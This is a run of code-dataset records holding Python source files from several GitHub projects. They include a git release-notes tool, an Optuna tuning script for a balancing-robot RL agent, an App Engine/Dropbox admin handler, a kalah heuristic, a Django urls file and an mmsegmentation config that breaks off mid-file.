= ent.strip()\n info = ent.split(\"^\")\n if len(info) > 1:\n tag, ct, cname, hsh = info\n tag = re.search(r\"\\btag: ([\\S,]+)\", tag)\n if tag:\n cur_tag = tag[1]\n if ent.startswith(self.notes_dir):\n self.logs.append((cur_tag, ct, cname, hsh, ent))\n\n def load_note(self, tag, file, ct, cname, hsh, notes):\n \"\"\"Load specified note into notes list.\"\"\"\n try:\n log.debug(\"load note: %s, %s\", tag, file)\n with open(file, encoding=\"utf8\") as f:\n note = yaml.safe_load(f)\n for k, v in note.items():\n assert k in self.valid_sections, \"%s: %s is not a valid section\" % (\n file,\n k,\n )\n if type(v) is str:\n v = [v]\n assert (\n type(v) is list\n ), \"%s: '%s' : list of entries or single string\" % (file, k)\n for line in v:\n assert (\n type(line) is str\n ), \"%s: '%s' : must be a simple string\" % (file, line)\n line = {\n \"time\": int(ct),\n \"name\": cname,\n \"hash\": hsh,\n \"note\": line,\n }\n notes[tag][k].append(line)\n except FileNotFoundError:\n log.debug(\"ignoring missing file %s\", file)\n except Exception as e:\n print(\"Error reading file %s: %s\" % (file, repr(e)))\n raise\n\n def get_notes(self):\n \"\"\"Fill self.notes with a structured list of notes.\"\"\"\n seen = {}\n notes = defaultdict(lambda: defaultdict(lambda: []))\n for tag, ct, cname, hsh, file in self.logs:\n if seen.get(file): # pragma: no cover\n # defensive, can happen with weird logs, hard to set up\n continue\n seen[file] = True\n try:\n self.load_note(tag, file, ct, cname, hsh, notes)\n except FileNotFoundError:\n pass\n\n cname = self.git(\"config\", \"user.name\").strip()\n\n for file in self.git(\"diff\", \"--name-only\", \"--cached\").split(\"\\n\"):\n path = normalize(file.strip())\n self._load_uncommitted(seen, notes, path, cname)\n\n for porc in self.git(\"status\", \"--porcelain\").split(\"\\n\"):\n path = normalize(porc[3:].strip())\n self._load_uncommitted(seen, notes, path, cname)\n\n if self.args.lint:\n # every file, not just diffs\n for file in os.listdir(self.notes_dir):\n path = normalize(os.path.join(self.notes_dir, file))\n self._load_uncommitted(seen, notes, path, cname)\n\n self.notes = notes\n\n def _load_uncommitted(self, seen, notes, path, cname):\n if seen.get(path):\n return\n if not os.path.isfile(path):\n return\n if not path.endswith(\".yaml\"):\n return\n if not 
path.startswith(self.notes_dir):\n return\n seen[path] = True\n self.load_note(\"Uncommitted\", path, os.stat(path).st_mtime, cname, None, notes)\n\n def get_report(self):\n \"\"\"Turn self.notes into a markdown report.\"\"\"\n num = 0\n for tag, sections in self.notes.items():\n if tag == \"HEAD\":\n tag = \"Current Branch\"\n if num > 0:\n print(\"\")\n num += 1\n print(tag)\n print(\"=\" * len(tag))\n\n ents = sections.get(self.prelude_name, {})\n for ent in sorted(ents, key=lambda ent: ent[\"time\"], reverse=True):\n note = ent[\"note\"].strip()\n print(note, \"\\n\")\n\n for sec, title in self.sections.items():\n ents = sections.get(sec, {})\n if not ents:\n continue\n print()\n print(title)\n print(\"-\" * len(title))\n for ent in sorted(ents, key=lambda ent: ent[\"time\"], reverse=True):\n note = ent[\"note\"]\n if self.args.blame:\n epoch = ent[\"time\"]\n name = ent[\"name\"]\n hsh = ent[\"hash\"]\n hsh = \"`\" + hsh + \"`\" if hsh else \"\"\n print(\n \"-\",\n note,\n hsh,\n \"(\" + name + \")\",\n time.strftime(\"%y-%m-%d\", time.localtime(epoch)),\n )\n else:\n print(\"-\", note)\n\n def get_branch(self):\n \"\"\"Get current branch name.\"\"\"\n return self.git(\"rev-parse\", \"--abbrev-ref\", \"HEAD\").strip()\n\n def switch_branch(self, branch):\n \"\"\"Switch current branch.\"\"\"\n self.git(\"-c\", \"advice.detachedHead=false\", \"checkout\", branch)\n\n def create_new(self):\n \"\"\"Create a new note with an editor and prompt for git add.\"\"\"\n ymd = datetime.today().strftime(\"%Y-%m-%d\")\n name = ymd + \"-\" + os.urandom(8).hex() + \".yaml\"\n fp = os.path.join(self.notes_dir, name)\n with open(fp, \"w\", encoding=\"utf8\") as fh:\n fh.write(self.cfg.get(\"template\"))\n\n # get editor\n editor = self.cfg.get(\n \"editor.\" + sys.platform, self.cfg.get(\"editor\", os.environ.get(\"VISUAL\"))\n )\n\n if not editor: # pragma: no cover\n if sys.platform == \"win32\":\n editor = \"notepad.exe\"\n else:\n editor = \"vi\"\n\n exe = shutil.which(editor)\n if exe:\n cmd = [exe, fp]\n subprocess.run(cmd, check=True)\n else: # pragma: no cover\n # happens in the windows tests, since they use a cmd builtin\n subprocess.run(editor + ' \"' + fp + '\"', check=True, shell=True)\n\n self.lint_file(fp)\n\n answer = input(\"Add to git [y|n]: \")\n if answer[0].lower() == \"y\":\n self.git(\"add\", fp)\n\n print(\"Created:\", normalize(fp))\n\n def lint_file(self, fp):\n \"\"\"Lint a single file.\"\"\"\n seen = {}\n notes = defaultdict(lambda: defaultdict(lambda: []))\n cname = self.git(\"config\", \"user.name\").strip()\n\n self._load_uncommitted(seen, notes, fp, cname)\n\n def run(self):\n \"\"\"Run the program, with current args.\"\"\"\n orig = None\n if self.args.create:\n self.create_new()\n return\n\n if self.args.check:\n self.branch_check()\n return\n\n if self.ver_end != \"HEAD\":\n orig = self.get_branch()\n self.switch_branch(self.ver_end)\n try:\n self.get_tags()\n self.get_start_from_end()\n self.get_logs()\n if orig:\n self.switch_branch(orig)\n orig = None\n self.get_notes()\n if self.args.lint:\n return\n if self.args.yaml:\n print(yaml.dump(self.notes))\n return\n self.get_report()\n\n print(self.report)\n finally:\n if orig:\n self.switch_branch(orig)\n\n def message(self, msgid):\n \"\"\"Get a message based on msgid, uses DEFAULT_CONFIG if not set.\"\"\"\n msg = self.cfg.get(\"messages\", {}).get(msgid, None)\n msg = msg or DEFAULT_CONFIG[\"messages\"][msgid]\n return msg\n\n def not_important(self, filename):\n \"\"\"True if the filename will be skipped by the branch 
check.\"\"\"\n skip = self.cfg.get(\"skip\", [])\n for ent in skip:\n if re.search(ent, filename):\n return True\n return False\n\n def branch_check(self):\n \"\"\"Check current branch for new notes.\"\"\"\n # target for diff, in order of precedence\n\n target = self.args.target\n\n if not target:\n br = os.environ.get(\n \"GITHUB_BASE_REF\", os.environ.get(\"CI_MERGE_REQUEST_TARGET_BRANCH_NAME\")\n ) # github & gitlab ci\n if br:\n target = \"origin/\" + br\n\n target = target or self.cfg.get(\"merge-target\")\n\n if not target:\n # no upstream configured, guess\n for ent in self.git(\n \"branch\", \"-r\", \"--format\", \"%(refname:short)\", \"--list\", \"origin/ma??*\"\n ).split(\"\\n\"):\n if ent in (\"origin/master\", \"origin/main\"):\n target = ent\n\n assert target, self.message(Msg.NEED_TARGET)\n\n try:\n diff_base = self.git(\"merge-base\", \"HEAD\", target).strip()\n print(\"Check merge target:\", target + \", diff base:\", diff_base)\n except subprocess.CalledProcessError:\n print(\"Check merge target:\", target)\n diff_base = target\n\n need_notes = False\n all_diff = self.git(\"diff\", \"--name-only\", diff_base)\n for ent in all_diff.split(\"\\n\"):\n ent = ent.strip()\n if not ent or self.not_important(ent):\n continue\n if ent.startswith(self.notes_dir):\n self.lint_file(ent)\n continue\n log.debug(\"need notes: %s\", ent)\n need_notes = True\n break\n\n if not need_notes:\n return\n\n diff = self.git(\"diff\", \"--name-only\", \"--diff-filter=A\", diff_base)\n for ent in diff.split(\"\\n\"):\n ent = ent.strip()\n if ent.startswith(self.notes_dir):\n print(\"Found new note:\", ent)\n return\n\n assert False, self.message(Msg.NEED_NOTE)\n","repo_name":"AtakamaLLC/rnotes","sub_path":"rnotes/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":14640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9668904997","text":"# ======================================================================\n# Balancio-Kit (c) 2021 Linar (UdeSA)\n# This code is licensed under MIT license (see LICENSE.txt for details)\n# ======================================================================\n\"\"\"\nScript for optimizing RL hyperparameters.\nBased on: https://github.com/araffin/rl-baselines-zoo/blob/master/utils/hyperparams_opt.py\n\"\"\"\n\n# Filter tensorflow version warnings\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=Warning)\nimport tensorflow as tf\ntf.get_logger().setLevel('INFO')\ntf.autograph.set_verbosity(0)\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\n\nimport yaml\nimport argparse\nfrom typing import Any, Dict\nimport gym\nfrom balancio_lib.environments import balancioGymEnv\nfrom balancio_lib.wrappers import RewardWrappers\nfrom stable_baselines import A2C\nfrom stable_baselines.common.callbacks import EvalCallback\nfrom stable_baselines.common import set_global_seeds\nimport optuna\nfrom optuna.pruners import MedianPruner\nfrom optuna.visualization import plot_optimization_history, plot_param_importances\n\n\n# Instantiate the parser\nparser = argparse.ArgumentParser(description='Script for optimizing RL hyperparameters.')\nparser.add_argument(\"-a\", \"--Algo\", action='store', default='A2C', type=str,\n help=\"Reinforcement Learning algorithm used during training [Default: 'A2C'].\")\nparser.add_argument(\"-en\", \"--EnvName\", action='store', 
default='p_1', type=str,\n help=\"Environment name: 'pif_b' --> p if pitch, i if imu, f if feedback, b buffer length. [Default: 'p_1'].\")\nparser.add_argument(\"-rw\", \"--RewardWrapper\", action='store', default='None', type=str,\n help=\"Apply a reward wrapper to change the default reward [Optional].\")\nargs = parser.parse_args()\n\n\n# Optuna HyperParameters Tuning\nRL_ALGO_NAME = args.Algo.upper() # Algorithm to which hp are to be optimized\nN_TRIALS = 200 # Total number of optimization iterations\nN_JOBS = 2 # Number of parallel runs\nN_TIMESTEPS = int(1e5) # Total simulation steps per trial\nN_STARTUP_TRIALS = N_TRIALS // 3 # Number of trials before enabling pruning\nN_WARMUP_STEPS = N_TIMESTEPS // 3 # Number of steps before enabling pruning, in each trial.\nN_EVALUATIONS = 5 # Number of evaluations in each trial.\nN_EVAL_EPISODES = 2 # Number of episodes to test the agent in each evaluation.\nTIMEOUT = 10 # Timeout in hours\n\n# Environment\nNORMALIZE = True\nBACKLASH = True\nmemory_buffer = int(args.EnvName[args.EnvName.find(\"_\")+1::])\nonly_pitch = not 'i' in args.EnvName\npolicy_feedback = 'f' in args.EnvName\nLoopFreq = 100 # Hz\nStepPeriod = (1 / 240) * 1 / 10 # s\nactions_per_step = int(round((1 / LoopFreq) / StepPeriod)) # For Microcontroller loop frequency compatibility\nSEED = 0\n\n\ndef sample_a2c_params(trial: optuna.Trial) -> Dict[str, Any]:\n \"\"\"Sampler for A2C hyperparameters.\"\"\"\n gamma = trial.suggest_categorical(\"gamma\", [0.9, 0.95, 0.98, 0.99, 0.995, 0.999, 0.9999])\n max_grad_norm = trial.suggest_categorical(\"max_grad_norm\", [0.3, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 2, 5])\n alpha = trial.suggest_categorical(\"alpha\", [0.8, 0.9, 0.92, 0.95, 0.98, 0.99, 1.0])\n n_steps = trial.suggest_categorical(\"n_steps\", [8, 16, 32, 64, 128, 256, 512, 1024, 2048])\n vf_coef = trial.suggest_uniform(\"vf_coef\", 0, 1)\n lr_schedule = \"constant\" # trial.suggest_categorical(\"lr_schedule\", [\"linear\", \"constant\"])\n learning_rate = trial.suggest_loguniform(\"learning_rate\", 1e-5, 1)\n ent_coef = trial.suggest_loguniform(\"ent_coef\", 0.00000001, 0.1)\n # ortho_init = trial.suggest_categorical(\"ortho_init\", [False, True])\n neurons_layer = trial.suggest_categorical(\"neurons_layer\", [16, 32, 64, 128])\n # activation_fn = trial.suggest_categorical(\"activation_fn\", [\"tanh\", \"relu\"])\n\n # Display true values\n # trial.set_user_attr(\"gamma_\", gamma)\n # trial.set_user_attr(\"alpha_\", alpha)\n # trial.set_user_attr(\"n_steps\", n_steps)\n\n net_arch = 2*[neurons_layer]\n\n # net_arch = [64, 64]\n act_fun = tf.nn.relu # {\"tanh\": tf.nn.tanh, \"relu\": tf.nn.relu}[activation_fn]\n\n return {\n \"n_steps\": n_steps,\n \"gamma\": gamma,\n \"alpha\": alpha,\n \"lr_schedule\": lr_schedule,\n \"learning_rate\": learning_rate,\n \"vf_coef\": vf_coef,\n \"ent_coef\": ent_coef,\n \"max_grad_norm\": max_grad_norm,\n \"policy_kwargs\": {\n \"net_arch\": net_arch,\n \"act_fun\": act_fun,\n # \"ortho_init\": ortho_init,\n },\n }\n\n\nclass TrialEvalCallback(EvalCallback):\n \"\"\"Callback used for evaluating and reporting a trial.\"\"\"\n\n def __init__(\n self,\n eval_env: gym.Env,\n trial: optuna.Trial,\n n_eval_episodes: int = 5,\n eval_freq: int = 10000,\n deterministic: bool = True,\n verbose: int = 0,\n ):\n\n super().__init__(\n eval_env=eval_env,\n n_eval_episodes=n_eval_episodes,\n eval_freq=eval_freq,\n deterministic=deterministic,\n verbose=verbose,\n )\n self.trial = trial\n self.eval_idx = 0\n self.is_pruned = False\n\n def _on_step(self) -> bool:\n if 
self.eval_freq > 0 and self.n_calls % self.eval_freq == 0:\n super()._on_step()\n self.eval_idx += 1\n self.trial.report(self.last_mean_reward, self.eval_idx)\n # Prune trial if need\n if self.trial.should_prune():\n self.is_pruned = True\n return False\n return True\n\n\ndef objective(trial: optuna.Trial) -> float:\n # Add useful wrappers around the environment\n reward_wrapper = RewardWrappers.get_reward_wrapper(args.RewardWrapper)\n\n env = reward_wrapper(balancioGymEnv.BalancioGymEnv(action_repeat=actions_per_step, renders=False, normalize=NORMALIZE,\n backlash=BACKLASH, memory_buffer=memory_buffer, only_pitch=only_pitch,\n policy_feedback=policy_feedback))\n\n DEFAULT_HYPERPARAMS = {\n \"policy\": \"MlpPolicy\",\n \"env\": env,\n }\n\n kwargs = DEFAULT_HYPERPARAMS.copy()\n\n if args.Algo.upper() == \"A2C\":\n # Sample hyperparameters\n kwargs.update(sample_a2c_params(trial))\n # Create the RL model\n model = A2C(**kwargs)\n else:\n raise Exception(\"Insert a compatible RL algorithm: A2C, ...\")\n\n # Create env used for evaluation\n eval_env = reward_wrapper(balancioGymEnv.BalancioGymEnv(action_repeat=actions_per_step, renders=False, normalize=NORMALIZE,\n backlash=BACKLASH, memory_buffer=memory_buffer, only_pitch=only_pitch,\n policy_feedback=policy_feedback))\n\n # Create the callback that will periodically evaluate\n # and report the performance\n eval_callback = TrialEvalCallback(\n eval_env,\n trial,\n n_eval_episodes=N_EVAL_EPISODES,\n eval_freq=int(N_TIMESTEPS / N_EVALUATIONS),\n deterministic=True,\n )\n\n nan_encountered = False\n try:\n model.learn(N_TIMESTEPS, callback=eval_callback)\n except AssertionError as e:\n # Sometimes, random hyperparams can generate NaN\n print(e)\n nan_encountered = True\n finally:\n # Free memory\n model.env.close()\n eval_env.close()\n\n # Tell the optimizer that the trial failed\n if nan_encountered:\n return float(\"nan\")\n\n if eval_callback.is_pruned:\n raise optuna.exceptions.TrialPruned()\n\n return eval_callback.last_mean_reward\n\n\nif __name__ == \"__main__\":\n\n sampler = optuna.samplers.CmaEsSampler()\n # sampler = TPESampler(n_startup_trials=N_STARTUP_TRIALS)\n # Do not prune before 1/3 of the max budget is used\n pruner = MedianPruner(\n n_startup_trials=N_STARTUP_TRIALS, n_warmup_steps=N_WARMUP_STEPS\n )\n\n study = optuna.create_study(sampler=sampler, pruner=pruner, direction=\"maximize\")\n\n try:\n study.optimize(objective, n_trials=N_TRIALS, n_jobs=N_JOBS, timeout=int(60 * 60 * TIMEOUT))\n except KeyboardInterrupt:\n pass\n\n print(\"Number of finished trials: \", len(study.trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(f\" Value: {trial.value}\")\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(f\" {key}: {value}\")\n\n # print(\" User attrs:\")\n # for key, value in trial.user_attrs.items():\n # print(f\" {key}: {value}\")\n\n # Write report\n study.trials_dataframe().to_csv(\"../rl_data/hyperparameters/HyperParameters_optuna.csv\")\n\n with open(\"../rl_data/hyperparameters/HP.yaml\", \"w\") as f:\n param_dict = {RL_ALGO_NAME: study.best_params}\n yaml.dump(param_dict, f)\n f.close()\n\n fig1 = plot_optimization_history(study)\n fig1.show()\n fig2 = plot_param_importances(study)\n fig2.show()\n","repo_name":"udesa-ai/balancio-kit","sub_path":"simulation/hyperparameters_optimization.py","file_name":"hyperparameters_optimization.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} 
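The balancio-kit record above wires an Optuna sampler and a `MedianPruner` around an RL training loop. The same wiring on a toy objective, without the PyBullet environment: the reward surface here is made up purely for illustration, and `TPESampler` stands in for the record's `CmaEsSampler` (which additionally needs the `cmaes` package and warns on categorical parameters).

```python
# Stripped-down version of the tuning loop above on a synthetic objective;
# the pruner arguments mirror the record, the objective does not.
import optuna
from optuna.pruners import MedianPruner

def objective(trial: optuna.Trial) -> float:
    lr = trial.suggest_loguniform("learning_rate", 1e-5, 1)
    gamma = trial.suggest_categorical("gamma", [0.9, 0.99, 0.999])
    # pretend "reward": peaks near lr=1e-3 with gamma=0.99
    return -abs(lr - 1e-3) + (1.0 if gamma == 0.99 else 0.0)

study = optuna.create_study(
    sampler=optuna.samplers.TPESampler(n_startup_trials=5),
    pruner=MedianPruner(n_startup_trials=5),
    direction="maximize",
)
study.optimize(objective, n_trials=25)
print(study.best_params)
```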
+{"seq_id":"21199746023","text":"import os\nimport logging\nfrom cStringIO import StringIO\nimport cgi\nimport urllib\n\nfrom google.appengine.ext.webapp import template #Also fixes Django paths\nimport wsgiref.handlers\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.api import namespace_manager\nimport dropbox.auth\nimport dropbox.client\nfrom oauth.oauth import OAuthToken\n\nimport config\nfrom siteinadropbox import models\nfrom siteinadropbox import controller\nfrom siteinadropbox import cache\nfrom siteinadropbox.handlers import dropboxhandlers\nfrom siteinadropbox.handlers.cdeferred import CDeferredHandler\n\ndef admin_url(s=None):\n if not s:\n return config.ADMIN_URL\n return config.ADMIN_URL+s\n\ndef owneronly(f):\n \"\"\"\n Decorator to populate self.site and self.user\n If a site record exists, allow only the matching user to be logged in.\n \"\"\"\n def new_f(self, *args, **kwargs):\n self.site = models.Site.get_current_site()\n self.user = users.get_current_user()\n if self.site and self.site.owner_id != self.user.user_id():\n logging.info('/admin/auth: Denying admin access for %s (id: %s). Owner ID is: %s'%(\n self.user.email(), self.user.user_id(), self.site.owner_id))\n self.response.set_status(403)\n self.render_to_template({},'admin_403.html')\n return\n f(self, *args, **kwargs)\n return new_f\n\ndef withgov(f):\n \"\"\"\n Decorator to populate self.gov and self.user\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n self.gov = controller.get_current_site_controller()\n except models.InvalidSiteError:\n logging.debug('Access to admin page of invalid site attempted')\n self.redirect(admin_url())\n return\n self.user = users.get_current_user()\n if gov and gov.site.owner_id != user.user_id():\n logging.info('/admin/auth: Denying admin access for %s (id: %s). Owner ID is: %s'%(user.email(), user.user_id(), site.owner_id))\n self.redirect(admin_url())\n return\n return f(self, *args, **kwargs)\n return new_f\n\n#def is_namespace_allowed(namespace):\n# \"\"\"\n# Return True if an account can be established for the given namespace.\n# Currently always returns true\n# \"\"\"\n# logging.info(\"Namespace request for %s\"%namespace)\n# return True\n\nclass BaseHandler(webapp.RequestHandler):\n def render_to_template(self,template_values, template_name=None):\n values ={\n 'auth_formurl': admin_url('authorize-dropbox'),\n 'formurl': admin_url(),\n 'apps_namespace' : namespace_manager.google_apps_namespace(),\n 'current_namespace' : namespace_manager.get_namespace(),\n 'server_name' : os.environ['SERVER_NAME'],\n 'settings' : config.TEMPLATE_SETTINGS,\n 'user' : users.get_current_user(),\n 'login_url': users.create_login_url(admin_url()),\n 'logout_url': users.create_logout_url(admin_url()),\n 'request': self.request, #e.g. for request.url\n }\n values.update(template_values)\n template_path=os.path.join('templates',template_name)\n \n self.response.out.write( template.render(template_path, values))\n\nclass StatusHandler(BaseHandler):\n @owneronly\n def get(self):\n # These should always succeed: Site.get can only fail if\n # there is no logged-in user.\n if self.site:\n client = self.site.get_dropbox_client()\n dropbox_info=None\n account_good=False\n if self.site and client:\n dropbox_info=client.account_info()\n account_good= (dropbox_info.status == 200)\n #dropbox_info.data holds the account info, e.g. 
{u'referral_link': u'https://www.dropbox.com/referrals/NTM1NTU1Mzg5', u'display_name': u'Janus Wesenberg', u'uid': 3555538, u'country': u'SG', u'quota_info': {u'shared': 40610557, u'quota': 5905580032L, u'normal': 3305647577L}, u'email': u'janus@halwe.dk'}\n\n        if account_good and (\n            self.site.dropbox_display_name != dropbox_info.data['display_name'] or\n            self.site.dropbox_email != dropbox_info.data['email'] ):\n\n            logging.info('Updating dropbox credentials')\n            self.site.dropbox_display_name = dropbox_info.data['display_name']\n            self.site.dropbox_email = dropbox_info.data['email'] \n            self.site.put()\n\n        if account_good:\n            logging.debug('/admin: Account good')\n            return self.status(self.site, dropbox_info)\n        logging.debug('/admin: Account not good, showing welcome page')\n        return self.welcome(self.site, dropbox_info)\n\n    @owneronly\n    def post(self):\n        \"\"\"\n        Callers should supply 'action'\n        Callers can supply 'redirect_url'\n        Action and response will be delivered to redirect_url \n        \"\"\"\n        if not self.site:\n            logging.info('/admin-post: Denying admin access')\n            return self.error(403)\n        action = self.request.POST.get('action').lower()\n        nexturl = self.request.POST.get('redirect_url', admin_url())\n        gov = controller.get_current_site_controller()\n        logging.debug('Admin/post, action =%s, nexturl: %s'%(action, nexturl))\n        response = ''\n        assert(action in ['save', 'flush', 'reload', 'verify', 'delete', 'sync'])\n        if action == 'save':\n            self.save_config_path()\n        elif action == 'flush':\n            cache.flush_all()\n        elif action == 'reload':\n            models.flush_resources(self.site)\n        elif action == 'verify':\n            gov.do_verify_database_consistency()\n        elif action == 'sync':\n            models.schedule_sync(gov)\n        elif action == 'delete':\n            #todo\n            raise NotImplementedError('Delete not implemented')\n        \n        self.redirect('%s?%s'%(nexturl, urllib.urlencode({'action': action, 'response': response})))\n\n    def save_config_path(self):\n        new_config_path = self.request.get('config_path')\n        if self.site.set_config_path(new_config_path):\n            self.site.put()\n            gov = controller.get_current_site_controller()\n            gov.handle_config_changes()\n        self.redirect(admin_url())\n\n    def welcome(self,site,dropbox_info):\n        self.render_to_template({\n            'site_raw': site,\n            'dropbox_info': dropbox_info,\n            },'admin_welcome.html')\n\n    def status(self,site,dropbox_info):\n        #Namespace listing:\n        #http://code.google.com/appengine/docs/python/datastore/metadataqueries.html#Namespace_Queries\n        self.render_to_template({\n            'site_raw': site,\n            'dropbox_info': dropbox_info,\n            'config_path': site.get_config_path(),\n            },'admin_status.html')\n\ndef list_all_resources(nmax=1000):\n    \"\"\"\n    Returns a list of tuples (key_name, DirEntry instance, Resource instance),\n    so that all objects of class DirEntry and Resource are represented\n    \"\"\"\n    resources = [(r.parent(), r) for r in models.Resource.all().fetch(nmax)]\n    orphans = [(None, None, r) for (p,r) in resources if not p]\n\n    direntries = dict((d.key().name(), d) for d in models.DirEntry.all().fetch(nmax))\n    resources = [(p.key().name(), direntries.pop(p.key().name(),None), r) for (p,r) in resources if p]\n    childless = [(d.key().name(), d, None) for d in direntries.values()]\n    return orphans+sorted(resources+childless, key= lambda x: x[0])\n\ndef direntrytype(de):\n    if de:\n        return (\n            (de.is_root() and 'R') or\n            (de.is_fake() and 'P') or\n            (de.is_dir and 'D') or\n            'F'\n            )\n\n\nclass ContentHandler(BaseHandler):\n    fields = [\n        ('type', lambda k,d,r: direntrytype(d)),\n        ('name', lambda k,d,r: k),\n        ('url', lambda 
k,d,r: r and r.url),\n ('db_rev', lambda k,d,r: d and d.revision),\n ('r_rev', lambda k,d,r: r and r.revision),\n ]\n \n @owneronly\n def get(self):\n rlist = list_all_resources()\n content_list = [dict((k,f(*r)) for k,f in self.fields ) for r in rlist]\n self.render_to_template(template_name= 'admin_content.html', template_values = {'content_list': content_list})\n\n\n \nclass ConfigHandler(BaseHandler):\n @owneronly\n def get(self):\n gov = controller.get_current_site_controller()\n config_path, config_src = gov.get_config_yaml()\n self.render_to_template(template_name= 'admin_config.html',\n template_values = {'config_default': config.DEFAULT_CONFIG_YAML,\n 'config_path': config_path,\n 'config_src': config_src})\n \ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n CDeferredHandler.set_controller_factory(controller.get_current_site_controller)\n\n routes=[\n (admin_url()[:-1], webapp.RedirectHandler.new_factory(admin_url(), permanent=True)),\n (admin_url(), StatusHandler),\n (admin_url('config'), ConfigHandler),\n (admin_url('content'), ContentHandler),\n (admin_url('authorize-dropbox'), dropboxhandlers.AuthHandler.new_factory(formurl = admin_url('authorize-dropbox'), returnurl=admin_url())),\n (config.CDEFERRED_URL, CDeferredHandler)\n ]\n application = webapp.WSGIApplication(routes,debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Japanuspus/Site-in-a-Dropbox","sub_path":"app/siteinadropbox/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":9573,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8678691893","text":"# THIS IS TEMPLATE FOR FUNCTION. PLEASE FOLLOW THE RULES:\n# 1) Do Not print anything!!!\n# 2) Do not exit(0) or smth\n# 3) Please do not try to hack us.\n\n\ndef func(state: list[int]) -> int:\n \"\"\"Implementation of minimax strategy\n\n :param state: list[int]\n state[0:6] -- your pits, state[6] -- your kalah\n state[8:13] -- opponent's pits, state[13] -- opponent's kalah\n :return: int\n result for minimax\n \"\"\"\n\n # PLACE YOUR CODE HERE\n max = 0\n copy = 0\n N = len(state)\n for i in range (N):\n if state[i] > max:\n max = state[i]\n else:\n if state[i] == max:\n copy = max\n\n if max == 6:\n if state[max + 1] > state[max - 1]:\n max = max + 1\n else:\n max = max - 1\n\n if max == 13:\n max = max - 1\n\n if max > 6:\n max = 14 - max\n\n\n\n # result for minimax\n return max\n","repo_name":"Enoras/DSL_lab","sub_path":"tourn/1190996360.py","file_name":"1190996360.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70281677929","text":"#from django.conf.urls import include\nfrom django.conf.urls import url\n#from django.contrib import admin\nfrom django.contrib.auth.views import login\n\nfrom . 
import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n    #url(r'^admin/', include(admin.site.urls)),\n    #url(r'^login/$', login, name='login'),\n    url(r'^login/$', login,\n        {'template_name': 'accounts/login.html'},\n        name='login'),\n    url(r'^logout/$', views.logout, name='logout'),\n]\n\n","repo_name":"akivajp/active_annotator","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73241112169","text":"# model settings\nnorm_cfg = dict(type='BN', requires_grad=True)\ndata_preprocessor = dict(\n    type='SegDataPreProcessor',\n    mean=[123.675, 116.28, 103.53],\n    std=[58.395, 57.12, 57.375],\n    bgr_to_rgb=True,\n    pad_val=0,\n    seg_pad_val=255,\n    size=(256, 256))\n\nmodel = dict(\n    type='EncoderDecoder',\n    data_preprocessor=data_preprocessor,\n    pretrained='open-mmlab://resnet50_v1c',\n    backbone=dict(\n        type='ResNetV1c',\n        depth=50,\n        num_stages=4,\n        out_indices=(0, 1, 2, 3),\n        dilations=(1, 1, 2, 4),\n        strides=(1, 2, 1, 1),\n        norm_cfg=norm_cfg,\n        norm_eval=False,\n        style='pytorch',\n        contract_dilation=True),\n    decode_head=dict(\n        type='PSPHead',\n        in_channels=2048,\n        in_index=3,\n        channels=512,\n        pool_scales=(1, 2, 3, 6),\n        dropout_ratio=0.1,\n        num_classes=6,\n        norm_cfg=norm_cfg,\n        align_corners=False,\n        loss_decode=dict(\n            type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),\n    auxiliary_head=dict(\n        type='FCNHead',\n        in_channels=1024,\n        in_index=2,\n        channels=256,\n        num_convs=1,\n        concat_input=False,\n        dropout_ratio=0.1,\n        num_classes=6,\n        norm_cfg=norm_cfg,\n        align_corners=False,\n        loss_decode=dict(\n            type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),\n    # model training and testing settings\n    train_cfg=dict(),\n    test_cfg=dict(mode='whole'))\n\n\n# pre-trained model weights\nload_from = 'https://download.openmmlab.com/mmsegmentation/v0.5/pspnet/pspnet_r50-d8_512x1024_40k_cityscapes/pspnet_r50-d8_512x1024_40k_cityscapes_20200605_003338-2966598c.pth'\n\n# dataset settings\ndataset_type = 'WaterMelonDataset'  # dataset class name\ndata_root = '/root/autodl-tmp/MMSeg/Watermelon87_Semantic_Seg_Mask/'  # dataset path (relative to the mmsegmentation root directory)\ncrop_size = (256, 256)\ntrain_pipeline = [\n    dict(type='LoadImageFromFile'),\n    dict(type='LoadAnnotations'),\n    dict(\n        type='RandomResize',\n        scale=(2048, 1024),\n        ratio_range=(0.5, 2.0),\n        keep_ratio=True),\n    dict(type='RandomCrop', crop_size=crop_size, cat_max_ratio=0.75),\n    dict(type='RandomFlip', prob=0.5),\n    dict(type='PhotoMetricDistortion'),\n    dict(type='PackSegInputs')\n]\ntest_pipeline = [\n    dict(type='LoadImageFromFile'),\n    dict(type='Resize', scale=(2048, 1024), keep_ratio=True),\n    # add loading annotation after ``Resize`` because ground truth\n    # does not need to do resize data transform\n    dict(type='LoadAnnotations'),\n    dict(type='PackSegInputs')\n]\nimg_ratios = [0.5, 0.75, 1.0, 1.25, 1.5, 1.75]\ntta_pipeline = [\n    dict(type='LoadImageFromFile', file_client_args=dict(backend='disk')),\n    dict(\n        type='TestTimeAug',\n        transforms=[\n            [\n                dict(type='Resize', scale_factor=r, keep_ratio=True)\n                for r in 